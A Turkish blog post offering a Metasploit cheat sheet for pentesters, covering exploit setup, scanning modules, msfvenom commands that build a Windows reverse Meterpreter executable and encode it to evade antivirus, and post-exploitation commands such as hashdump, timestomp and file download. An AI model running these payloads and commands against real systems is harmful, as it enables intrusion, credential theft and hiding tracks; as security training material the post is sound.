Metasploit İpuçları

Bu makalede, Metasploit ile ilgili ipuçlarını sizlere sunacağım. Umarım size yardımcı olur! 🙂

Metasploit Nedir?

Metasploit, pentesterlar tarafından kullanılan popüler bir araçtır.
Bu sorunun cevabını ayrıntılı olarak okumak isterseniz, daha önceki makalemizde mevcuttur. Buradan okuyabilirsiniz.

Metasploit:

Modül aramak için:

msf > search [regex]

Belirlenen exploiti kullanmak için:

msf > use exploit/[ExploitPath]

(Exploit Path: Exploit’in Adı)

Payload kullanmak için:

msf > set PAYLOAD [PayloadPath]

(Payload Path: Payload’ın Adı)

Mevcut modüller için seçenekleri gösterme:

msf > show options

Seçenekleri ayarlamak için:

msf > set [Option] [Value]

(Option: Seçenek Value: Değer)

Exploit’i başlatmak:

msf > exploit

Kullanışlı Auxiliary Modülleri

Port Scanner (Port Tarayıcısı):

msf > use auxiliary/scanner /portscan /tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration (DNS Numaralandırma):

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

(target: hedef)

FTP Server (FTP Sunucusu):

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server (Proxy Sunucusu):

msf > use auxiliary/server/socks4
msf > run

msfvenom

msfvenom aracı, Meterpreter Payload’larını bağımsız dosyalar haline getirmenize yarar. Ayrıca, isteğinize bağlı olarak dosyaları şifreleyebilirsiniz. Bu araç, eski olan msfpayload ve msfencode araçlarının yerini almıştır. Payload’ların listesi için ” -l payload “ komutunu çalıştırabilirsiniz.

msfvenom -p [PayloadPath]
-f [FormatType]
LHOST= [LocalHost]
LPORT= [LocalPort]

(Format Type: Biçim Türü)
(Local Host: Yerel Host)
(Local Port: Yerel Port)

Örnek:
Yürütülebilir Reverse Meterpreter payload’un dosyaya çevirilmesi

msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe

Biçim Seçenekleri ( ” -f ” ile belirtilir) –help-formats = Biçim çıktılarının listesi.

exe = Çalıştırılabilir Program Dili (Kullanılabilen diller Perl rb, Ruby raw, Raw Shellcode C ve C code’dır.)

msfvenom Kullanarak Payload Şifreleme

msfvenom aracı, aynı zamanda anti-virus atlatmak için bir seviye şifreleme de uygulayabilir. Şifreleyicilerin listesi için ” -l encoders ” komutunu çalıştırabilirsiniz.

msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInteractions]
LHOST=[LocalHost]
LPORT=[LocalPort]

(Encode Interactions: Şifreleyicinin Adı)

Örnek:
shikata-ga-nai şifreleyicisini kullanarak bir payload’ı 5 kez şifreleme işlemi:

msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Meterpreter

Temel Komutlar:

? / help: Komutların bir özetini görüntüler.
exit / quit: Meterpreter’dan çıkış yapar.
sysinfo: Sistem adını ve İşletim Sistemi türünü görüntüler.
shutdown: Makinanızı kapatır.
reboot: Makinanızı yeniden başlatır.

Dosya Sistem Komutları:

cd: Dizin değiştirir.
lcd: Yerel makinadaki (saldırganın makinası) dizini değiştirir.
pwd / getwd: O anda çalışan dizinleri gösterir.
ls: Dizinin içindekileri gösterir.
cat: Bir dosyanın içeriklerini ekranda gösterir.
download: Hedef makinadan yerel makinaya dosya yükler.
upload: Hedef makinaya yerel makinadan dosya gönderir.
mkdir: Dizin oluşturur.
rmdir: Dizin siler.
edit: Bir dosyayı varsayılan düzenleyicide açar (Bu düzenleyici genellikle vi’dir)

İşlem Komutları:

getpid: Meterpreter’ın içinde çalıştırdığı işlem numarasını görüntüler.
getuid: Meterpreter’ın çalıştığı kullanıcının adını görüntüler.
ps: İşlem listesini görüntüler.
kill: İşlem numarasıyla verilmiş işlemi sonlandırır.
execute: Bir programı sadece Meterpreter’da çalışan yüklü işlemin ayrıcalıklarıyla çalıştırır.
migrate: Verilen bir hedef işlem numarasına atlar.

  • Hedef işlem ya aynı ya da daha az ayrıcalığa sahip olmak zorundadır.
  • Hedef işlem sabit bir işlem olabilir.
  • Bir işlemin içindeyken, işlemin kilitlediği dosyalara erişebilirsiniz.

Ağ Komutları:

ipconfig: Ağ arayüzü bilgisini gösterir.
portfwd: TCP oturumundan paket iletir.
route: Rota tablosunu görüntüler ve düzenler.

Diğer Komutlar:

idletime: Hedef makinanın GUI’ının ne kadar süredir kullanılmadığını görüntüler.
screenshot: Hedef makinadan ekran görüntüsü alır.

Ek Komutlar:

use [modül]: Belirtilen modülü yükler.
Örnek:
use priv: Priv modülünü yükler.
hashdump: Kutudan hash’leri boşaltır.
timestomp: NTFS timestamplerini (zaman etiketleri) değiştirir.

Oturumları Yönetme:

Çoklu Exploitleme:

Aniden arkaya plana atılmış tek bir oturum bekleyen exploiti çalıştırma:

msf > exploit -z

Aniden arka plana atılmış bir veya birden fazla oturum bekleyen exploiti çalıştırma:

msf > exploit –j

Şimdiki işlerin hepsini listeme (genellikle exploit dinleyicileridir):

msf > jobs –l

Bir işi sonlandırma:

msf > jobs –k [JobID]

(Job ID: İş Numarası)

Çoklu Oturumlar:

Arkaplandaki oturumların hepsini listeler:

msf > sessions -l

Arkaplanda bulunan bir oturumla etkileşimde bulunma:

msf > session -i [SessionID]

(Session Id: Oturum Numarası)

Şimdiki interaktif oturumu arka plana gönderme:

meterpreter > <Ctrl+Z>
Ya da
meterpreter > background

Oturumlar Arasında Rota Bulma:
Bu oturumda hedefin subnet mask’ine karşı olan bütün modüller kapatılır.

msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]

(Subnet to Route to: Gidilecek Subnet)
(Session ID: Oturum numarası)

İyi şanslar!

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Reklama Tıkla Destek Ol!